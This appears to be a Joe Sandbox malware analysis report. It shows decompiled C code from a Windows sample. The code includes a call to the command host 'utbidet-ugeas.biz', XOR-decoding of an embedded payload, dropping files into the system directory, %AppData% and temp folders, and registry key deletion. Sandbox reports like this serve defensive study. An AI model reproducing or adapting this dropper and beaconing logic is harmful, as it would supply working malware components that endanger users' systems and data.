Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: FileInternetReadrecvselect
String ID: (
API String ID: 1361185869-3887548279
Opcode ID: 40fda63411a4479776fd01e72a871d7921f88cd08bf6b18510cebb54a805897b
Instruction ID: 3ea35419ed2d3212b6131b0e69722baf812322277d3c9b307799a4a859a905b3
Opcode Fuzzy Hash: 40fda63411a4479776fd01e72a871d7921f88cd08bf6b18510cebb54a805897b
Instruction Fuzzy Hash: 5941A1701083569BD3218F29C880B6BBBE4EF45320F14C66FF9D9962E2D3389841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00401625 Relevance: 6.1, APIs: 4, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401625(intOrPtr __eax, char* __edx, intOrPtr _a4, char _a8) {
				signed int _v288;
				signed int _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v320;
				intOrPtr _v336;
				signed int _t26;
				signed int _t27;
				signed int* _t29;
				void* _t30;
				void* _t34;
				void* _t35;
				signed int _t39;
				char* _t41;
				char* _t42;
				intOrPtr _t43;
				void* _t44;
				signed int* _t45;

				_t41 = __edx;
				_t45 = _t44 - 0x120;
				_t43 = _a4;
				_v300 = __eax;
				 *_t45 = 0;
				_v288 = 0;
				L1:
				while(_t43 != 0) {
					_t39 = _v288;
					_t27 = 0;
					while(_t27 < _t39 &&  *((intOrPtr*)(_t45 + 0x14 + _t27 * 4)) != _v300) {
						_t27 = _t27 + 1;
					}
					if(_t27 == _t39 && _t27 <= 0x3f) {
						 *((intOrPtr*)(_t45 + 0x14 + _t27 * 4)) = _v300;
						_v288 = _t27 + 1;
					}
					_v292 = 0;
					_v296 = _a8;
					_push( &_v296);
					_push(0);
					_push(0);
					_t29 =  &_v288;
					_push(_t29);
					_push(0);
					L00406120();
					_t30 = _t29 - 1;
					if(_t30 != 0) {
						break;
					} else {
						_push(2);
						_push(_t43);
						_push(_t41);
						_push(_v320);
						L00406130();
						_t34 = _t30;
						if(_t30 <= 0) {
							break;
						}
						_t42 = _t41;
						while( *_t42 != 0xa) {
							_t42 = _t42 + 1;
							_t30 = _t30 - 1;
							if(_t30 != 0) {
								continue;
							}
							_push(0);
							_t43 = _t43 - _t34;
							asm("sbb ebx, 0x0");
							_push(_t34);
							_push(_t41);
							_t41 = _t41 + _t34;
							_push(_v336);
							L00406130();
							 *_t45 =  *_t45 + _t34;
							goto L1;
						}
						_push(0);
						_t35 = _t34 - _t30;
						_t20 = _t35 + 1; // 0x1
						_push(_t41);
						_push(_v336);
						L00406130();
						if(_t35 == 0 ||  *((char*)(_t42 - 1)) != 0xd) {
							 *_t42 = 0;
						} else {
							 *((char*)(_t42 - 1)) = 0;
							_t35 = _t35 - 1;
						}
						_t26 =  *_t45 + _t35;
						L22:
						return _t26;
					}
				}
				 *_t41 = 0;
				_t26 =  *_t45;
				if(_t26 == 0) {
					_t26 = _t26 | 0xffffffff;
				}
				goto L22;
			}

0x00401627
0x0040162b
0x00401631
0x00401638
0x0040163c
0x00401643
0x00000000
0x0040164b
0x00401653
0x00401657
0x00401659
0x00401667
0x00401667
0x0040166c
0x00401677
0x0040167c
0x0040167c
0x00401680
0x00401693
0x00401697
0x00401698
0x0040169a
0x0040169c
0x004016a0
0x004016a1
0x004016a3
0x004016a8
0x004016a9
0x00000000
0x004016ab
0x004016ab
0x004016ad
0x004016ae
0x004016af
0x004016b3
0x004016ba
0x004016bc
0x00000000
0x00000000
0x004016be
0x004016c0
0x004016f2
0x004016f3
0x004016f4
0x00000000
0x00000000
0x004016f6
0x004016f8
0x004016fd
0x00401700
0x00401701
0x00401702
0x00401704
0x00401708
0x0040170d
0x00000000
0x0040170d
0x004016c5
0x004016c7
0x004016c9
0x004016cd
0x004016ce
0x004016d2
0x004016d9
0x004016e8
0x004016e1
0x004016e1
0x004016e5
0x004016e5
0x004016ee
0x00401722
0x0040172c
0x0040172c
0x004016a9
0x00401715
0x00401718
0x0040171d
0x0040171f
0x0040171f
0x00000000

APIs

select.WS2_32(00000000,?,00000000,00000000,?), ref: 004016A3
recv.WS2_32(00000000,?,?,00000002), ref: 004016B3
recv.WS2_32(00000000,?,00000001,00000000), ref: 004016D2
recv.WS2_32(00000000,?,00000000,00000000), ref: 00401708

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: recv$select
String ID:
API String ID: 873784944-0
Opcode ID: 19cfc51653fbec052deccd225765072a13761a54495cffc271f2aaf0d58c8bdb
Instruction ID: e7af01451db4feedd7893defef3d64e674ab9aaaa9521898a169f104c070c285
Opcode Fuzzy Hash: 19cfc51653fbec052deccd225765072a13761a54495cffc271f2aaf0d58c8bdb
Instruction Fuzzy Hash: CC31A0301083429FE7209E28CC80B2BBBD8EB95748F184D3EF5D5A72E1E37A88158756

Uniqueness

Uniqueness Score: -1.00%

Function 004025C3 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E004025C3(char _a4) {
				char _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v24;
				signed int _t12;
				signed int _t13;
				void* _t18;
				void* _t20;
				char* _t22;
				intOrPtr* _t23;
				signed int* _t24;

				_t12 = 0x19c08;
				E00405C00();
				_t23 =  *0x4121b0;
				if(_t23 == 0) {
					L8:
					_t13 = _t12 | 0xffffffff;
				} else {
					_a4 = 0x19c;
					_v4 = 0x19c00;
					_t12 =  *_t23( &_a4,  &_v4,  &_v0);
					if(0x19c08 == 0) {
						 *_t24 = 0;
						while(_t12 < _v12) {
							_push("modem");
							_t22 =  &_v8;
							_t18 = _t22 + 0x109 + _t12 * 0x19c;
							_push(_t18);
							L00405E50();
							if(_t18 == 0) {
								L6:
								_t13 = 0;
							} else {
								_push("isdn");
								_t20 = _t22 + 0x109 + _v24 * 0x19c;
								_push(_t20);
								L00405E50();
								if(_t20 != 0) {
									_t12 =  *_t24 + 1;
									 *_t24 = _t12;
									continue;
								} else {
									goto L6;
								}
							}
							goto L9;
						}
					}
					goto L8;
				}
				L9:
				return _t13;
			}

0x004025c4
0x004025c9
0x004025ce
0x004025d6
0x00402654
0x00402654
0x004025d8
0x004025d8
0x004025e4
0x004025f6
0x004025fa
0x004025fc
0x00402603
0x00402609
0x00402614
0x00402618
0x0040261f
0x00402620
0x00402627
0x00402647
0x00402647
0x00402629
0x00402629
0x00402636
0x0040263d
0x0040263e
0x00402645
0x0040264e
0x0040264f
0x00000000
0x00000000
0x00000000
0x00000000
0x00402645
0x00000000
0x00402627
0x00402603
0x00000000
0x004025fa
0x00402657
0x0040265e

APIs

lstrcmpi.KERNEL32 ref: 00402620
lstrcmpi.KERNEL32 ref: 0040263E

Strings

isdn, xrefs: 00402629
modem, xrefs: 00402609

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: isdn$modem
API String ID: 1586166983-1928581975
Opcode ID: 8146aa7d45ddf9213865f455b1552900cd1ed20f7322fa4dc1291e7ed423a0ba
Instruction ID: 9b8ea77cd675e603e91f08c673882212f316c2627d3a17e85c4274d3e77867b6
Opcode Fuzzy Hash: 8146aa7d45ddf9213865f455b1552900cd1ed20f7322fa4dc1291e7ed423a0ba
Instruction Fuzzy Hash: 91015270104702ABD700EF64CA98BAB73E8AB54704F548C3AB5D8D62C0E7B9D5858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004012C2 Relevance: 6.0, APIs: 4, Instructions: 28
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004012C2(int __eax) {
				char _v540;
				int _t2;
				CHAR* _t4;
				int _t5;
				intOrPtr* _t6;
				intOrPtr _t10;

				_t2 = __eax;
				_t5 = __eax;
				_t6 = 0x410c80;
				_t10 =  *0x410c80;
				while(_t10 != 0) {
					_push( *_t6);
					_t6 = _t6 + 4;
					_push(_t5);
					_t4 =  &_v540;
					_push(_t4);
					L00405E20();
					_push(_t2);
					L00405E30();
					SetFileAttributesA(_t4, 0x80);
					_t2 = DeleteFileA(_t4);
					_t10 =  *_t6;
				}
				return _t2;
			}

0x004012c2
0x004012c3
0x004012c6
0x004012d2
0x004012d9
0x004012db
0x004012dd
0x004012e0
0x004012e1
0x004012e5
0x004012e6
0x004012eb
0x004012ec
0x004012f7
0x004012fd
0x00401302
0x00401302
0x00401310

APIs

lstrcpy.KERNEL32(?), ref: 004012E6
lstrcat.KERNEL32(00000000,?), ref: 004012EC
SetFileAttributesA.KERNEL32(?,00000080,00000000,?,?,00410C80), ref: 004012F7
DeleteFileA.KERNEL32(?,?,00000080,00000000,?,?,00410C80), ref: 004012FD

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$AttributesDeletelstrcatlstrcpy
String ID:
API String ID: 875521641-0
Opcode ID: 155f869a8d2c8b8c2bfbe120dc05a94955090dbad50f581c6a2e5c60ed242bff
Instruction ID: 5708c53113cc1b56bc36642c0f65cd934a376a65166fd27ea49a52d45fe0ee74
Opcode Fuzzy Hash: 155f869a8d2c8b8c2bfbe120dc05a94955090dbad50f581c6a2e5c60ed242bff
Instruction Fuzzy Hash: 78E0D87244020066F6203779EC8DBDB719CEB50354F100A3FF4C5711D1A6BC65D489AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401FBB Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401FBB(void* __eax, intOrPtr _a4088) {
				char _v4;
				char* _t6;
				void* _t7;

				_push(__eax);
				E00405C00();
				_push(_a4088);
				_push("http://utbidet-ugeas.biz/d/rpt?");
				_t6 =  &_v4;
				_push(_t6);
				L00405E20();
				_push(_t6);
				L00405E30();
				_t7 = E004019E8(_t6, 0, 1);
				if(_t7 != 0) {
					_t7 = E00401F59(_t7);
				}
				return _t7;
			}

0x00401fbb
0x00401fc1
0x00401fcd
0x00401fce
0x00401fd3
0x00401fd7
0x00401fd8
0x00401fdd
0x00401fde
0x00401fe7
0x00401fef
0x00401ff1
0x00401ff1
0x00401ffc

APIs

lstrcpy.KERNEL32(00000012,http://utbidet-ugeas.biz/d/rpt?), ref: 00401FD8
lstrcat.KERNEL32(00000000,00000012), ref: 00401FDE

Part of subcall function 004019E8: lstrcpy.KERNEL32(?), ref: 00401A14
Part of subcall function 004019E8: lstrlen.KERNEL32(00000000,?), ref: 00401A1A
Part of subcall function 004019E8: htons.WS2_32(00000050), ref: 00401A7B
Part of subcall function 004019E8: socket.WS2_32(00000002,00000001,00000006), ref: 00401AD6
Part of subcall function 004019E8: closesocket.WS2_32(00000000), ref: 00401AF9
Part of subcall function 004019E8: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Win32),00000004,00000000,00000000,00000000), ref: 00401C0F
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000002,00000004), ref: 00401C35
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000006,00000004,00000004), ref: 00401C41
Part of subcall function 004019E8: InternetSetOptionA.WININET(00000000,00000005,00000004,00000004), ref: 00401C4D

Part of subcall function 00401F59: InternetCloseHandle.WININET(?), ref: 00401F64
Part of subcall function 00401F59: InternetCloseHandle.WININET(00000000), ref: 00401F6C

Strings

urlinj_conn, xrefs: 00401FBB
http://utbidet-ugeas.biz/d/rpt?, xrefs: 00401FCE

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: Internet$Option$CloseHandlelstrcpy$Openclosesockethtonslstrcatlstrlensocket
String ID: http://utbidet-ugeas.biz/d/rpt?$urlinj_conn
API String ID: 1417007407-2018722472
Opcode ID: 160c73f2664787e70d104c44272e6d34a41457b2801fe17a4dc247fb701dc91f
Instruction ID: dcd2b2d7d85f2ee865dda91bc73112af5befebb961346a1fd4e47604b50803ab
Opcode Fuzzy Hash: 160c73f2664787e70d104c44272e6d34a41457b2801fe17a4dc247fb701dc91f
Instruction Fuzzy Hash: 06D012B164060756E710B3F6CC4ABAB218D9F44358FC0443A7148E51D1DABCD580566D

Uniqueness

Uniqueness Score: -1.00%

Function 0040385C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,RasEnumConnectionsA), ref: 00403874

Strings

RasEnumConnectionsA, xrefs: 0040385C, 0040386E
iphlpapi.dll, xrefs: 0040388A

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: RasEnumConnectionsA$iphlpapi.dll
API String ID: 190572456-2181992158
Opcode ID: 8db1fa8c4ac57291dcac78cdb1220f9509de1ccc7371f44f51738c5d27491f15
Instruction ID: 2bd81031e0f0fc3a03d94630145fcdd2a3789661c70154c2603156bb0e404be5
Opcode Fuzzy Hash: 8db1fa8c4ac57291dcac78cdb1220f9509de1ccc7371f44f51738c5d27491f15
Instruction Fuzzy Hash: EFD0172210864268C7052A7909810A92E98E517765338DFF7F1B3E90D6D3BCAAC34A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004038AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetIpAddrTable), ref: 004038C4

Strings

GetIpAddrTable, xrefs: 004038AC, 004038BE
_Classes, xrefs: 004038DA

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: GetIpAddrTable$_Classes
API String ID: 190572456-3592534314
Opcode ID: bcd1a865101a547805a78b1c32fdabf224cd4a56b1fd69fae467257179b7e29f
Instruction ID: 19f3e7cda966fd936d07cde807497132fe501c7d05929ad1586fdb7c28509cfa
Opcode Fuzzy Hash: bcd1a865101a547805a78b1c32fdabf224cd4a56b1fd69fae467257179b7e29f
Instruction Fuzzy Hash: CCD012216082436AC7116924088009E2D48E566765330CAF3F1A3E91D1D2BC99E2576E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: olfopeh-outix.exePID: 5168, Parent PID: 5360COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	1779
Total number of Limit Nodes:	93

Executed Functions

Function 00404933 Relevance: 328.5, APIs: 140, Strings: 47, Instructions: 1235
stringfileregistryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00404933() {
				int _t254;
				signed char* _t255;
				void* _t256;
				void* _t258;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t269;
				void* _t270;
				void* _t271;
				CHAR* _t274;
				void* _t276;
				long _t277;
				CHAR* _t278;
				void* _t280;
				long _t281;
				CHAR* _t286;
				void* _t288;
				CHAR* _t289;
				void* _t291;
				signed char* _t301;
				void* _t302;
				void* _t305;
				signed char* _t307;
				void* _t310;
				void* _t311;
				void* _t317;
				void* _t318;
				void* _t323;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t336;
				void* _t338;
				void* _t343;
				long _t347;
				int _t348;
				void* _t354;
				void* _t356;
				void* _t359;
				void* _t366;
				void* _t368;
				void* _t370;
				void* _t375;
				void* _t378;
				void* _t380;
				void* _t383;
				void* _t385;
				void* _t389;
				void* _t394;
				void* _t396;
				void* _t398;
				struct _SECURITY_ATTRIBUTES* _t402;
				void* _t403;
				void* _t405;
				signed char* _t406;
				signed char* _t407;
				void* _t408;
				signed char* _t409;
				signed char* _t410;
				signed char* _t411;
				signed char* _t412;
				signed char* _t413;
				void* _t414;
				signed char* _t415;
				void* _t416;
				char* _t418;
				CHAR* _t419;
				void* _t423;
				void* _t425;
				int _t428;
				void* _t442;
				int _t443;
				void* _t446;
				CHAR* _t452;
				void* _t454;
				long _t455;
				void* _t460;
				void* _t468;
				void* _t469;
				signed char _t477;
				void* _t483;
				void* _t487;
				void* _t489;
				int _t490;
				void* _t493;
				signed char _t504;
				void* _t506;
				void* _t508;
				void* _t509;
				int* _t510;
				signed int* _t513;
				long _t523;
				int _t524;
				signed char _t534;
				CHAR* _t537;
				CHAR* _t538;
				CHAR* _t539;
				CHAR* _t540;
				CHAR* _t541;
				CHAR* _t542;
				CHAR* _t543;
				CHAR* _t544;
				CHAR* _t545;
				int* _t546;
				void** _t547;
				char* _t548;
				char* _t549;
				CHAR* _t550;
				void* _t553;
				char* _t554;
				char* _t556;
				char* _t557;
				char* _t558;
				int* _t559;
				CHAR* _t560;
				int _t561;
				void* _t562;
				signed int* _t564;
				char* _t565;
				int* _t569;
				int* _t570;
				void* _t571;
				int _t573;
				int _t574;
				void* _t575;
				signed int* _t599;
				int* _t600;
				signed char* _t601;
				signed int* _t603;
				char* _t605;
				signed char* _t606;
				void* _t607;
				signed int* _t608;
				void** _t609;
				void* _t611;
				void** _t612;
				void** _t613;
				char* _t614;
				CHAR* _t615;
				int* _t616;
				int* _t617;
				signed int* _t618;
				void* _t619;
				void* _t620;
				char* _t621;
				signed int* _t622;
				long _t623;
				struct _FILETIME* _t624;
				int* _t625;

				_t537 =  &(_t625[0x3cb]);
				_t254 = GetSystemDirectoryA(_t537, 0x104);
				_push( *0x412090);
				_push(0x41103e);
				_push(_t537);
				L00405E30();
				_push(_t254);
				L00405E30();
				_t255 = "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}";
				goto L1;
				L6:
				_t538 =  &(_t625[0x3cb]);
				SetFileAttributesA(_t538, 0x80); // executed
				_t258 = CreateFileA(_t538, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t625[0x28] = _t258;
				__eflags = _t258;
				if(_t258 == 0) {
					L22:
					RegCloseKey(_t625[0x26]); // executed
					RegDeleteKeyA(0x80000001,  &(_t625[0x40e])); // executed
					_t263 = E004030DE( &(_t625[0x1ee]));
					_t625[0x26] = _t263;
					__eflags = _t263;
					if(_t263 == 0) {
						L43:
						_t264 = E004010B2();
						__eflags = _t264;
						_t573 = _t264;
						if(_t264 == 0) {
							_t573 = 0x42;
						}
						_t625[0x1ee] = _t573;
						_t265 = E004010B2();
						__eflags = _t265;
						_t574 = _t265;
						if(_t265 == 0) {
							_t574 = 0x4d;
						}
						_t625[0x162] = _t574;
						_push( *0x4120b0);
						_push( &(_t625[0x163]));
						L00405E20();
						_push( &(_t625[0x55a]));
						_push( &(_t625[0x1ac]));
						L00405E20();
						_t608 = _t625[5];
						_t269 = _t608 + _t623;
						while(1) {
							__eflags = _t608 - _t269;
							if(_t608 >= _t269) {
								break;
							}
							 *_t608 =  *_t608 ^ _t625[0x162] & 0x000000ff;
							_t608 =  &(_t608[0]);
							_t269 = _t625[5] + _t623;
						}
						_t539 =  &(_t625[0x517]);
						_t270 = ExpandEnvironmentStringsA("%AppData%\\", _t539, 0x104);
						__eflags = _t270;
						if(_t270 == 0) {
							L54:
							_t540 =  &(_t625[0x516]);
							_t271 = GetTempPathA(0x104, _t540);
							__eflags = _t271;
							if(_t271 != 0) {
								_t615 =  &(_t625[0x16a]);
								_t468 = GetTempFileNameA(_t540, "tmp", 0, _t615);
								__eflags = _t468;
								if(_t468 == 0) {
									goto L62;
								}
								_t469 = CreateFileA(_t615, 0x40000000, 0, 0, 2, 0x80, 0);
								_t625[0x28] = _t469;
								__eflags = _t469;
								if(_t469 == 0) {
									goto L62;
								}
								__eflags = _t469 + 1;
								if(_t469 + 1 == 0) {
									goto L62;
								}
								L59:
								WriteFile(_t625[0x2c], _t625[8], _t623,  &(_t625[0x28]), 0); // executed
								CloseHandle(_t625[0x28]);
								CreateFileA( &(_t625[0x170]), 0x80000000, 1, 0, 3, 0, 0); // executed
								_t616 =  &(_t625[0x1ee]);
								_t599 =  &(_t625[0x162]);
								_t569 =  &(_t625[0x278]);
								while(1) {
									__eflags = _t616 - _t569;
									if(_t616 >= _t569) {
										goto L62;
									}
									_t477 = _t625[0x1ee] & 0x000000ff ^  *_t599;
									_t599 =  &(_t599[0]);
									 *_t616 = _t477;
									_t616 =  &(_t616[0]);
								}
							}
							goto L62;
						}
						_t617 =  &(_t625[0x16a]);
						_push(_t617);
						_push(0);
						_push(0x411040);
						_push(_t539);
						L00405E90();
						__eflags = _t270;
						if(_t270 == 0) {
							goto L54;
						}
						_push(0);
						_push(0x80);
						_push(2);
						_push(0);
						_push(0);
						_push(0x40000000);
						_push(_t617);
						L00405DB0();
						_t625[0x28] = _t270;
						__eflags = _t270;
						if(_t270 == 0) {
							goto L54;
						}
						__eflags = _t270 + 1;
						if(_t270 + 1 != 0) {
							goto L59;
						}
						goto L54;
					} else {
						RegDeleteValueA(_t263, "SubshellState");
						RegCloseKey(_t625[0x26]);
						_t618 =  &(_t625[0x1ee]);
						_t600 =  &(_t625[0x162]);
						_t570 =  &(_t625[0x278]);
						while(1) {
							__eflags = _t618 - _t570;
							if(_t618 >= _t570) {
								break;
							}
							_t504 = _t625[0x1ee] & 0x000000ff ^  *_t618;
							_t618 =  &(_t618[0]);
							 *_t600 = _t504;
							_t600 =  &(_t600[0]);
						}
						_push( *0x4120b0);
						_t483 =  &(_t625[0x163]);
						_push(_t483);
						L00405E50();
						__eflags = _t483;
						if(_t483 != 0) {
							L29:
							_t560 =  &(_t625[0x16b]);
							SetFileAttributesA(_t560, 0x80);
							DeleteFileA(_t560);
							goto L43;
						}
						_push( &(_t625[0x55a]));
						_t487 =  &(_t625[0x1ac]);
						_push(_t487);
						L00405E50();
						__eflags = _t487;
						if(_t487 == 0) {
							_t489 = CreateFileA( &(_t625[0x170]), 0x80000000, 1, 0, 3, 0, 0);
							_t625[0x28] = _t489;
							__eflags = _t489;
							if(_t489 == 0) {
								goto L29;
							}
							__eflags = _t489 - 0xffffffff;
							if(_t489 == 0xffffffff) {
								goto L29;
							}
							_t490 = GetFileSize(_t489, 0);
							_t625[0x1d] = _t490;
							__eflags = _t490 - _t623;
							if(_t490 == _t623) {
								_t493 = E00401000(_t623);
								_t619 = _t493;
								ReadFile(_t625[0x2c], _t493, _t623,  &(_t625[0x28]), 0);
								_t561 = _t625[0x1d];
								_t601 = _t619;
								_t606 = _t625[5];
								__eflags = _t619 - _t619 + _t561;
								while(__eflags < 0) {
									_t571 =  *_t601 & 0x000000ff;
									__eflags = _t625[0x162] - ( *_t606 & 0x000000ff);
									if(__eflags == 0) {
										__eflags = _t571;
									}
									if(__eflags == 0) {
										_t601 =  &(_t601[1]);
										_t606 =  &(_t606[1]);
										__eflags = _t601 - _t619 + _t561;
										continue;
									} else {
										E00401029(_t619);
										goto L33;
									}
								}
								E00401029(_t619);
								L62:
								E00401029(_t625[5]);
								_t541 =  &(_t625[0x387]);
								_t274 = GetSystemDirectoryA(_t541, 0x104);
								_push(0x80);
								_push( *0x4120c0);
								_push(0x41103e);
								_push(_t541);
								L00405E30();
								L00405E30();
								SetFileAttributesA(_t274, _t274); // executed
								_t276 = CreateFileA(_t541, 0x40000000, 0, 0, 2, 0x80, 0); // executed
								_t625[0x28] = _t276;
								__eflags = _t276;
								if(_t276 == 0) {
									L69:
									_t277 = GetLastError();
									__eflags = _t277 - 0x20;
									if(_t277 != 0x20) {
										_t542 =  &(_t625[0x387]);
										_t278 = ExpandEnvironmentStringsA("%AppData%\\", _t542, 0x104);
										_push(0x80);
										_push( *0x4120c0);
										L00405E30();
										SetFileAttributesA(_t278, _t542);
										_t280 = CreateFileA(_t542, 0x40000000, 0, 0, 2, 0x80, 0);
										_t625[0x28] = _t280;
										__eflags = _t280;
										if(_t280 == 0) {
											L73:
											_t281 = GetLastError();
											__eflags = _t281 - 0x20;
											if(_t281 == 0x20) {
												goto L70;
											}
											_t452 = GetTempPathA(0x104, _t542);
											_push(0x80);
											_push( *0x4120c0);
											L00405E30();
											SetFileAttributesA(_t452, _t542);
											_t454 = CreateFileA(_t542, 0x40000000, 0, 0, 2, 0x80, 0);
											_t625[0x28] = _t454;
											__eflags = _t454;
											if(_t454 == 0) {
												L76:
												_t455 = GetLastError();
												__eflags = _t455 - 0x20;
												if(_t455 == 0x20) {
													goto L70;
												}
												L79:
												_t543 =  &(_t625[0x343]);
												_t286 = ExpandEnvironmentStringsA("%AppData%\\", _t543, 0x104);
												_push(0x80);
												_push( *0x4120d0);
												L00405E30();
